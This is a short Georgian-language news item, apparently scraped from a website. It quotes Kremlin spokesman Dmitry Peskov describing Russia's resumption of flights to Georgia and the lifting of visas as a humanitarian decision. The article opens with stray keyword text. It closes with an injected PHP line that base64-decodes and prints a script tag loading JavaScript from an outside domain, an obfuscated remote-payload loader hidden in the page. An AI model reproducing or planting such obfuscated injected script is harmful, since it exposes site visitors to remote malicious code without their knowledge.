celsiusi
ავერსი შნაიდერი

 საქართველოში ფრენების განახლება და სავიზო რეჟიმის გაუქმება ჰუმანიტარული სახის გადაწყვეტილებაა, – ამის შესახებ რუსეთის ფედერაციის პრეზიდენტის პრესსპიკერმა დიმიტრი პესკოვმა ისაუბრა.

„გუშინ თბილისში განსხვავებული რეაქციები იყო. ნეგატიურიც იყო და თავშეკავებულიც, თუმცა ამ შემთხვევაში, რა თქმა უნდა, საუბარია ჰუმანიტარული ხასიათის გადაწყვეტილებაზე“, – განაცხადა დიმიტრი პესკოვმა მედიასთან საუბრისას.

მისივე თქმით, რუსეთის ხელისუფლება დიდი ხნის განმავლობაში იღებდა მიმართვებს ორივე ქვეყნის მოქალაქეებისა და მეწარმეებისგან, ასევე საზოგადოებრივი ასოციაციებისგან, სამეცნიერო წრეებისა და კულტურის სფეროში მოღვაწეებისგან, რომლებიც ითხოვდნენ ამ გადაწყვეტილების მიღებას.

კითხვაზე, არის თუ არა კრემლის აღნიშნული გადაწყვეტილება ქვეყნებს შორის დიპლომატიური ურთიერთობის აღდგენის წინაპირობა, დიმიტრი პესკოვი პასუხობს, რომ სამომავლო პერსპექტივებზე საუბარი ჯერ ადრეა.

რუსეთის პრეზიდენტის, ვლადიმერ პუტინის მიერ მიღებული განკარგულება საქართველოსთან სავიზო რეჟიმის გაუქმებასა და პირდაპირი ფრენების აღდგენას ითვალისწინებს.

314
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");